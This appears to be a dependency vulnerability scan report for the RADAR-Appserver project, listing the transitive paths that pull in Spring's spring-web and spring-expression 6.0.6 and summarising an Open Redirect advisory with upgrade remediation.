Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6
Overview
org.springframework:spring-web is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.
Affected versions of this package are vulnerable to Open Redirect when UriComponentsBuilder is used to parse an externally provided URL and perform validation checks on the host of the parsed URL.
Note: This is the same as CVE-2024-22259 and CVE-2024-22243, but with different input.
Remediation
Upgrade org.springframework:spring-web to version 5.3.34, 6.0.19, 6.1.6 or higher.
References
medium severity
- Vulnerable module: org.springframework:spring-expression
- Introduced through: org.radarbase:radar-spring-auth@1.2.1, org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-expression@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6
-
